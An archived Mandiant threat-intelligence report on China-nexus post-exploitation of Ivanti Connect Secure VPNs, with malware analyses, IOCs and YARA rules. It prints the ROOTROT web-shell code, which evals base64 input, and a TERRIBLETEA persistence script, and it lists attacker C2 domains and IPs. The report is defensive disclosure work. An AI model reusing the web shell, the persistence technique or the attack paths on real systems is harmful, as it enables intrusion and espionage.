{ "id": "eb0a2f7f-e3b3-48f0-a3d7-b999b45aa75e", "created_at": "2026-04-06T00:14:13.886912Z", "updated_at": "2026-04-10T03:34:44.460076Z", "deleted_at": null, "sha1_hash": "b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b", "title": "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 528875, "plain_text": "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies\r\nBy Mandiant\r\nPublished: 2024-04-04 · Archived: 2026-04-05 15:16:44 UTC\r\nWritten by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph\r\nPisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan\r\nSince the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted\r\nmultiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's\r\nprevious blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence\r\nAttempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus\r\nespionage actor that Mandiant tracks as UNC5325. \r\nThis blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types\r\nof activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did\r\nnot have the appropriate mitigation applied. \r\nMandiant has observed different types of post-exploitation activity across our incident response engagements,\r\nincluding lateral movement supported by the deployment of open-source tooling and custom malware families. In\r\naddition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by\r\nabusing appliance-specific functionality to achieve their objectives.\r\nAs of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by\r\nthe vulnerabilities. We recommend that customers follow Ivanti's latest patching guidance and instructions to\r\nprevent further exploitation activity. In addition, Ivanti released a new enhanced external integrity checker tool\r\n(ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other\r\ntactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening\r\nguide, which includes recommendations.\r\nMandiant recommends customers run both the internal and the latest external ICT released alongside a new patch\r\non April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge\r\nIvanti for their collaboration, transparency, and ongoing support throughout this process.\r\nClustering and Attribution\r\nMandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-\r\n21893 across our incident response investigations. In addition to suspected China-nexus espionage groups,\r\nMandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887,\r\nlikely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 1 of 20\n\nobserved eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are\r\nhighlighting five China-nexus clusters that have conducted intrusions. \r\nIn February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium\r\nconfidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix\r\nNetscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however\r\nMandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.\r\nUNC5221\r\nUNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-\r\n46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous\r\nblog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887\r\nfollowing the public disclosure on Jan. 10, 2024.\r\nUNC5266\r\nMandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER\r\nimplant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA.\r\nAt this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that\r\nUNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting\r\nvulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among\r\nothers, to gain initial access to target environments. \r\nUNC5330\r\nUNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893\r\nand CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has\r\nemployed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate\r\nregistry entries, and establish persistence.\r\nMandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to\r\nhelp facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from\r\nSept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this\r\nserver on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in\r\nconjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330\r\nhas been operating through this server since at least 2021. \r\nUNC5337\r\nUNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances\r\nas early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-\r\n21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom\r\nmalware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer,\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 2 of 20\n\nand SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is\r\nUNC5221. \r\nUNC5291\r\nUNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with\r\nUNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on\r\nCitrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in\r\nmid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns\r\nwith past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure\r\nSecurity Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and\r\nwas potentially interested in Ivanti Connect Secure devices for initial access.\r\nNew TTPs and Malware\r\nSince our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain\r\naccess to target environments and move laterally within them. Additionally, Mandiant has identified several new\r\ncode families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these\r\ncode families, several are assessed to be custom malware families; however, Mandiant has also identified the use\r\nof open-source tooling, such as SLIVER and CrackMapExec.\r\nSPAWN Malware Family\r\nDuring analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four\r\ndistinct malware families that work closely together to create a stealthy and persistent backdoor on an infected\r\nappliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid\r\ndetection. \r\nFigure 1 illustrates how the SPAWN malware family operates.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 3 of 20\n\nFigure 1: SPAWN malware family diagram\r\nSPAWNANT\r\nSPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the\r\nSPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and\r\nexports an sprintf function adding a malicious code to it before redirecting a flow back to vsnprintf .\r\nSPAWNMOLE\r\nSPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web\r\nprocess to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign\r\ntraffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host\r\nprovided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where\r\nSPAWNSNAIL is operating to access the backdoor.\r\nThe malware attempts to inject itself into a process named web .\r\nThe malware attempts to hijack the accept API from the libc binary within web process.\r\nThe malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.\r\nThe malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at\r\noffset 0x1b of the received buffer.\r\nSPAWNSNAIL\r\nSPAWNSNAIL ( libdsmeeting.so ) is a backdoor that listens on localhost. It is designed to run by injecting into\r\nthe dsmdm process (process responsible for supporting mobile device management features). It creates a\r\nbackdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the\r\nSPAWNMOLE tunneler to interact with SPAWNSNAIL.\r\nSPAWNSNAIL's second purpose is to inject SPAWNSLOTH ( .liblogblock.so ) into dslogserver , a process\r\nsupporting event logging on Connect Secure.\r\nSPAWNSNAIL checks if its binary name is dsmdm ; if it is running under that name, it creates two threads:\r\n1. First thread drops a hard-coded SSH host private key to /tmp/.dskey , configures libssh to use the key,\r\nand then deletes /tmp/.dskey . The malware binds to localhost on port 8300.\r\n1. The SSH server requires public key authentication.\r\n2. When starting an interactive shell session, the malware prints a banner with statistics about the\r\nsystem. It will print the information about the release, uptime, current time, and whether SELinux is\r\nenabled. SPAWNSNAIL then executes an interactive bash shell.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 4 of 20\n\n2. The second thread injects a log tampering utility, SPAWNSLOTH ( /tmp/.liblogblock.so ), into the\r\ndslogserver process up to three times.\r\nSPAWNSLOTH\r\nSPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and\r\ndisable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.\r\nSPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging\r\nfunction of dslogserver ). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a\r\nglobal variable controlling if event logs should be forwarded to an external syslog server.\r\nFinally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL\r\nbackdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.\r\nGetting to the Root of It\r\nDuring the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a\r\nnew web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a\r\nlegitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting\r\nCVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the\r\nappliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218.\r\nFigure 2 shows the code inserted into the setcookie.thmtl.ttc file that contains ROOTROT. The web shell can\r\nbe accessed at /dana-na/auth/setcookie.cgi . It parses the issued decoded Base64-encoded command and\r\nexecutes it with eval . \r\n $output .= \"\u003c/body\u003e\\n\\n\u003c/html\u003e\\n\";\r\n $output .= \"\u003c!--\\n\";\r\n my $key = CGI::param('[REDACTED]');\r\n use MIME::Base64;\r\n if(defined($key)){\r\n my $arg=decode_base64(\"$key\");\r\n eval($arg);\r\n }\r\n $output .= \"--\u003e\\n\";\r\n } };\r\n if ($@) {\r\n $error = $context-\u003ecatch($@, \\$output);\r\n die $error unless $error-\u003etype eq 'return';\r\n }\r\n \r\n return $output;\r\n },\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 5 of 20\n\nFigure 2: Code block inserted into the setcookie.thtml.ttc file\r\nDuring the investigation, Mandiant identified that the web shell was created on the system prior to the public\r\ndisclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the\r\npresence of ROOTROT by the existence of  \u003c!--\\n and --\u003e\\n at the end of the response from / dana-na/auth/setcookie.cgi . \r\nAs of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc .\r\nLateral Movement Leading to vCenter Compromise\r\nOnce UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated\r\nnetwork reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant\r\nidentified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. \r\nAfter moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter,\r\nutilizing a naming convention consistent with other servers in the environment. Though the virtual machine\r\ncreation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual\r\nmachine.\r\nFollowing this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM\r\nbackdoor to the appliance ( /home/vsphere-ui/vcli ) . Notably, BRICKSTORM appears to masquerade as a\r\nlegitimate vCenter process, vami-http . \r\nBRICKSTORM\r\nBRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a\r\nweb server, perform file system and directory manipulation, perform file operations such as upload/download, run\r\nshell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded\r\nC2.\r\nUpon execution, BRICKSTORM checks for an environment variable, WRITE_LOG , to determine if the file needs\r\nto be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample\r\nfrom /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd . It will then execute the copied\r\nBRICKSTORM sample and terminate execution.\r\n If WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd , and continues execution.\r\nBRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the\r\nenvironment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file\r\n/home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd . Then, it sets the\r\nappropriate environment variables and spawns the process. The watcher process then begins monitoring the exit\r\nstatus of the child process.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 6 of 20\n\nIf it finds the environment variable WORKER is set to true , it assumes it is a spawned worker process meant to\r\nexecute the backdoor functionality and skips the remainder of the Watcher function.\r\nBRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket\r\naddress of  wss://opra1.oprawh.workers[.]dev . Additionally, it contains the following legitimate DNS over\r\nHTTPS (DoH) addresses.\r\nhttps://9.9.9.9/dns-query\r\nhttps://45.90.28.160/dns-query\r\nhttps://45.90.30.160/dns-query\r\nhttps://149.112.112.112/dns-query\r\nhttps://9.9.9.11/dns-query\r\nhttps://1.1.1.1/dns-query\r\nhttps://1.0.0.1/dns-query\r\nhttps://8.8.8.8/dns-query\r\nhttps://8.8.4.4/dns-query\r\nFigure 3: DNS over HTTPS addresses\r\nBRICKSTORM appears to leverage a custom Go package called wssoft . There is no known, publicly available\r\nGo package with this name. It appears this may be the main package developed by the malware authors to perform\r\ntask processing and connection handling for the malware.\r\nTable 1 provides the four core functions provided by wssoft .\r\nFunction Comments\r\nSpawning a web server See below for accepted routes/endpoints\r\nCommand execution Executes shell commands using /bin/sh\r\nCommand execution (“NoContext”)\r\nExecutes shell commands using calls to os. Exec\r\nlikely accepts commands run_shell and exit\r\nSOCKS relaying Connection proxying\r\nTable 1: wssoft capabilities\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 7 of 20\n\nWhen the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses\r\nGorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON.\r\nTable 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.\r\nEndpoint Function\r\n/api/file/change-dir Change directory\r\n/api/file/delete-dir Deletes a directory\r\n/api/file/delete-file Deletes a file\r\n/api/file/mkdir Makes a directory (create subdirectories as necessary)\r\n/api/file/list-dir Lists directory contents\r\n/api/file/rename Renames a file\r\n/api/file/put-file File upload given a destination path, can optionally append to file\r\n/api/file/get-file File download\r\n/api/file/slice-up May upload large files in separate chunks\r\n/api/file/file-md5 Calculates file MD5\r\n/api/file/up Uploads a file using a web form (includes SHA256 hashing)\r\n/api/file/stat Gets file information\r\nTable 2: BRICKSTORM endpoints\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 8 of 20\n\nLateral Movement Leading to Active Directory Compromise\r\nUNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-\r\n21887, a tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind\r\naccount configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows\r\nCertificate Template, created a computer object, and requested a certificate for a domain administrator. The threat\r\nactor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential\r\nmaterial to move laterally.\r\nAttack Path Diagram\r\nFigure 4: UNC5330 attack path diagram\r\nWindows Certificate Template Abuse \r\nUNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create\r\na domain computer object, testComputer$ . UNC5330 used the newly created testComputer$ computer object\r\nto request a certificate from a vulnerable certificate template that provided enrollment rights to Domain\r\nComputers . UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using\r\nthe certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral\r\nmovement.\r\nOnce domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the\r\nPHANTOMNET backdoor.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 9 of 20\n\nWMI Event Consumers\r\nWMI was used to perform lateral movement and establish persistence within the victim environment, primarily by\r\ncreating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers\r\nperformed the following:\r\n1. Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute\r\ncommand with cmd.exe .\r\n2. Wrote command output to a .log file in C:\\Windows\\Temp .\r\n3. Deleted the scheduled task.\r\nThe behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with\r\na recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB.\r\nMandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.\r\nTONERJAM\r\nTONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as\r\nan encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the\r\nencrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects\r\ndepending on the permissions granted to it upon execution.\r\nPHANTOMNET\r\nPHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP.\r\nPHANTOMNET's core functionality involves expanding its capabilities through a plugin management system.\r\nThe downloaded plugins are mapped directly into memory and executed.\r\nSLIVER C2\r\nDuring a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on\r\nthe same IP address as the configured command-and-control server. The copies of SLIVER were placed in three\r\nseparate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266\r\nmodified a systemd service file to register one of the copies of SLIVER as a persistent daemon.\r\nPath Description\r\n/home/bin/netmon SLIVER\r\n/home/bin/logd SLIVER\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 10 of 20\n\n/home/runtime/logd SLIVER\r\n/home/config/logd.spec.cfg systemd service unit configuration file\r\nTable 3: SLIVER components\r\nAdditionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant\r\nwas downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda.\r\nSee Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.\r\nTERRIBLETEA\r\nAt a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation.\r\nHowever, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA.\r\nDuring this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these\r\nattempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an\r\nanonymous file sharing site: pan.xj.hk . UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in\r\nthe intervening seven minutes.\r\nTERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It\r\nis built using multiple open-source Go modules and has a multitude of capabilities including:\r\nCommand execution\r\nKeystroke logging\r\nSOCKS5 proxy\r\nPort scanning\r\nFile system interaction\r\nSQL query execution\r\nScreen captures\r\nAbility to open a new SSH session, execute commands, and upload files to a remote server. The following\r\ncommands may be executed:\r\nchmod +x /tmp/.udevd\r\n/tmp/.udevd \u003cargs\u003e\r\nls -lahrt /home/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 11 of 20\n\nTERRIBLETEA can take different execution paths depending on what environment it is configured for, either\r\nlinux_amd64 or darwin_amd64 . In this instance, TERRIBLETEA is configured for the linux_amd64\r\nenvironment. The sample persists with a Bash profile script located at /etc/profile.d/cron.sh for persistence.\r\n# Initialization script for bash and sh\r\n# export AFS if you are in AFS environment\r\na=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`\r\nif [ \"$a\" -eq 0 ]\r\nthen\r\n/bin/cron\r\nfi\r\nFigure 5: TERRIBLETEA Bash profile script\r\nOutlook and Implications\r\nThe activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325\r\ntargeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues\r\nto observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their\r\noperations and target organizations across the globe. \r\nMandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities\r\nagainst edge appliances. As previously reported by Mandiant, China-nexus actors continue to evolve their stealth\r\nto avoid detection by defenders. While the use of open--source tooling is somewhat common, Mandiant continues\r\nto observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.\r\nIndicators of Compromise (IOCs)\r\nHost-Based Indicators (HBIs)\r\nFilename MD5 Description\r\ndata.dat 9d684815bc96508b99e6302e253bc292 PHANTOMNET\r\nepdevmgr.dll b210a9a9f3587894e5a0f225b3a6519f TONERJAM\r\nlibdsproxy.so 4f79c70cce4207d0ad57a339a9c7f43c SPAWNMOLE\r\nlibdsmeeting.so e7d24813535f74187db31d4114f607a1 SPAWNSNAIL\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 12 of 20\n\nFilename MD5 Description\r\n.liblogblock.so 4acfc5df7f24c2354384f7449280d9e0  SPAWNSLOTH\r\n.dskey 3ef30bc3a7e4f5251d8c6e1d3825612d SPAWNSNAIL private key\r\nN/A bb3b286f88728060c80ea65993576ef8 TERRIBLETEA\r\nN/A cfca610934b271c26437c4ce891bad00 TERRIBLETEA\r\nN/A 08a817e0ae51a7b4a44bc6717143f9c2 TERRIBLETEA\r\nlinb64.png e7fdbed34f99c05bb5861910ca4cc994 SLIVER\r\nlint64.png c251afe252744116219f885980f2caea SLIVER\r\nlinb64.png 4f68862d3170abd510acd5c500e43548 SLIVER\r\nlint64.png 9d0b6276cbc4c8b63c269e1ddc145008 SLIVER\r\nlogd 71b4368ef2d91d49820c5b91f33179cb SLIVER\r\nwinb64.png d88bbed726d79124535e8f4d7de5592e SLIVER\r\nlogd.spec.cfg 846369b3a3d4536008a6e1b92ed09549 SLIVER persistence\r\nN/A 8e429d919e7585de33ea9d7bb29bc86b SLIVER downloader\r\nN/A fc1a8f73010f401d6e95a42889f99028 PHANTOMNET\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 13 of 20\n\nFilename MD5 Description\r\nN/A e72efc0753e6386fbca0a500836a566e PHANTOMNET\r\nN/A 4645f2f6800bc654d5fa812237896b00 BRICKSTORM\r\nTable 4: Host-based indicators\r\nNetwork-Based Indicators (NBIs)\r\nNetwork Indicator Type Description\r\n8.218.240[.]85 IPv4 Post-exploitation activity\r\n98.142.138[.]21 IPv4 Post-exploitation activity\r\n103.13.28[.]40 IPv4 Post-exploitation activity\r\n103.27.110[.]83 IPv4 Post-exploitation activity\r\n103.73.66[.]37 IPv4 Post-exploitation activity\r\n193.149.129[.]191 IPv4 Post-exploitation activity\r\n206.188.196[.]199 IPv4 Post-exploitation activity\r\noast[.]fun Domain Pre-exploitation validation\r\ncpanel.netbar[.]org Domain WARPWIRE Variant C2 server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 14 of 20\n\nNetwork Indicator Type Description\r\npan.xj[.]hk Domain Post-exploitation activity\r\nakapush.us[.]to Domain SLIVER C2 server\r\nopra1.oprawh.workers.dev Domain BRICKSTORM C2 server\r\nTable 5: Network-based indicators\r\nYARA Rules\r\nrule M_Hunting_Webshell_ROOTROT_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects ROOTROT, a web shell written in\r\nPerl that is embedded into a legitimate Pulse Secure .ttc file to\r\nenable arbitrary command execution.\"\r\n md5 = \"c7ffd2c06e9b7e8e0b7ac92a0dbe3294\"\r\n strings:\r\n $s1 = \"use MIME::Base64\" ascii\r\n $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73\r\n65 36 34 28 22 24 6b 65 79 22 29}\r\n $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e\r\n22 3b}\r\n $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e\r\n5c 6e 22}\r\n condition:\r\n filesize \u003c 4KB\r\n and all of them\r\n}\r\nrule M_Hunting_Backdoor_BRICKSTORM_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n created = \"2024-01-30\"\r\n md5 = \"4645f2f6800bc654d5fa812237896b00\"\r\n descr = \"Hunting rule looking for BRICKSTORM golang backdoor samples\"\r\n strings:\r\n $v1 = \"/home/vsphere-ui/vcli\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 15 of 20\n\n$v2 = \"/opt/vmware/sbin\" ascii wide\r\n $v3 = \"/opt/vmware/sbin/vami-httpd\" ascii wide\r\n $s1 = \"github.com/gorilla/mux\" ascii wide\r\n $s2 = \"WRITE_LOG=true\" ascii wide\r\n $s3 = \"wssoft\" ascii wide\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and filesize \u003c 6MB and 1 of ($v*) and 2 of ($s*)\r\n}\r\nimport \"pe\"\r\nrule M_APT_Backdoor_Win_PHANTOMNET_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"59f4d38a5caafbc94673c6d488bf37e3\"\r\n strings:\r\n $phantomnet = /\\\\PhantomNet-\\w{1,10}\\.pdb/ ascii nocase\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\nand all of them\r\n}\r\nrule M_APT_Backdoor_SLIVER_1\r\n{\r\n meta:\r\n Author = “Mandiant”\r\n description = \"Detects Windows, MacOS and ELF variants\r\nof the Sliver implant framework\"\r\n md5 = \"5ecd0c38501dfb02b682cec0a2d93aa9\"\r\n strings:\r\n $s1 = \".InvokeSpawnDllReq\"\r\n $s2 = \".(*InvokeSpawnDllReq).Reset\"\r\n $s3 = \".(*InvokeSpawnDllReq).ProtoMessage\"\r\n $s4 = \".(*InvokeSpawnDllReq).ProtoReflect\"\r\n $s5 = \".(*InvokeSpawnDllReq).Descriptor\"\r\n $s6 = \".(*InvokeSpawnDllReq).GetData\"\r\n $s7 = \".(*InvokeSpawnDllReq).GetProcessName\"\r\n $s8 = \".(*InvokeSpawnDllReq).GetArgs\"\r\n $s10 = \".(*InvokeSpawnDllReq).GetKill\"\r\n $s11 = \".(*InvokeSpawnDllReq).GetPPid\"\r\n $s12 = \".(*InvokeSpawnDllReq).GetProcessArgs\"\r\n $s13 = \".(*InvokeSpawnDllReq).GetRequest\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 16 of 20\n\n$s14 = \".(*InvokeSpawnDllReq).String\"\r\n $s15 = \".(*InvokeSpawnDllReq).GetEntryPoint\"\r\n condition:\r\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550)\r\nor uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0)\r\n== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE))\r\nand 5 of ($s*)\r\n}\r\nrule M_APT_Backdoor_TERRIBLETEA_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect on events related\r\nto terribletea. TERRIBLETEA is a backdoor written in Go that communicates\r\nover HTTP. Its many capabilities include shell command execution,\r\ncapturing screens, keystroke logging, port scanning, enumerating files,\r\nstarting a SOCKS5 proxy and new SSH session, downloading files, and\r\nexecuting SQL queries.\"\r\n md5 = \"bb3b286f88728060c80ea65993576ef8\"\r\n \r\n strings:\r\n $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E\r\n[1-12] 80 7B ?? 64}\r\n $code_get_task = { 48 8D [5] B9 04 00 00 00 48 8B ?? 24 [4] 48\r\n8D [5] 41 B8 03 00 00 00 E8}\r\n $func1 = \"SendRequest\" fullword\r\n $func2 =\"UploadResult\"\r\n $func3 =\"Online\"\r\n $func4 =\"GetCommond\"\r\n condition:\r\n all of ($code*) and any of ($func*) and filesize\u003c20MB\r\n}\r\nrule M_Launcher_TONERJAM_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects TONERJAM, a launcher that\r\ndecrypts and executes a shellcode payload stored as an 